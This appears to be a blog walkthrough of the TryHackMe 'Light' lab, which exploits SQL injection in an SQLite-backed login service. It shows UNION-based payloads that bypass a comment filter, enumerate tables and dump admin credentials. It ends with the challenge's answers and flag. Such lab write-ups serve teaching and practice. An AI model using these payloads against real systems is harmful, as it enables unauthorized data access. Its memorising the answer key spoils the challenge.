TryHackMe Light Full Walkthrough & SQL Injection Exploit

Aawart K C Lv1
  2025-06-26 22:05:59 2025-06-26 22:05:59 Created   2025-07-11 21:03:24 2025-07-11 21:03:24 Updated      361 Words  2 Mins  

Light
A beginner-friendly challenge focused on SQL Injection in SQLite.

Challenge Setup

While connecting to the machine on port 1337 using nc, we’re welcomed with a login prompt:

1
nc 10.10.39.206 1337

Output:

1
2
Welcome to the Light database!
Please enter your username:

Testing for SQL Injection

I started with classic test inputs:

1
2
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL

Then:

1
2
Please enter your username: admin
Username not found.

Trying a single quote:

1
2
Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"

This error confirms that SQL queries are constructed, unsafely allowing SQL Injection.

Understanding the Query Structure

Using inputs like:

1
2
Please enter your username: smokey' '
Error: near "''": syntax error

Suggested the query could look like:

1
SELECT password FROM users WHERE username = '.....' LIMIT 30;

Tried some filtering tests:

1
Please enter your username: smokey' --

Response:

1
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)

So characters like –, /*, and %0b are filtered. Time to get creative!

Bypassing Filters & Identifying the Database Type

I first assumed MySQL and tried:

1
' UNION SELECT @@version

But got:

1
Error: unrecognized token: "@"

Tried PostgreSQL and other DBMS payloads but no success. Then I try:

1
2
Please enter your username: ' Union Select sqlite_version()'
Password: 3.31.1

Boom! Two key takeaways:

  • Backend is SQLite
  • SQLi works even without comments

Extracting Tables & Data

To enumerate tables:

1
2
Please enter your username: ' Union Select name FROM sqlite_master'
Password: admintable

Found a table: admintable.

To dump credentials:

1
2
Please enter your username: ' Union Select username || '~' || password from admintable'
Password: TryHackMeAdmin~mamZtAuMlrsEy5bp6q17

To retrieve the flag:

1
2
Please enter your username: ' Union Select password from admintable'
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}

Why Two Different “Password” Outputs?

In this payload:

1
' Union Select username || '~' || password from admintable'

The || operator concatenates username and password with ~

Result: TryHackMeAdmin~mamZtAuMlrsEy5bp6q17

But here:

1
' Union Select password from admintable'

You’re fetching just the password column which contains the actual flag.

Challenge Answers

  1. Admin username: TryHackMeAdmin
  2. Password: mamZtAuMlrsEy5bp6q17
  3. Flag: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
  • Title: TryHackMe Light Full Walkthrough & SQL Injection Exploit
  • Author: Aawart K C
  • Created at : 2025-06-26 22:05:59
  • Updated at : 2025-07-11 21:03:24
  • Link: https://blog.aawart.com.np/TryHackMe-light-challenge/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
TryHackMe Light Full Walkthrough & SQL Injection Exploit
  1. Challenge Setup
  2. Testing for SQL Injection
  3. Understanding the Query Structure
  4. Bypassing Filters & Identifying the Database Type
  5. Extracting Tables & Data
  6. Why Two Different “Password” Outputs?
    1. Challenge Answers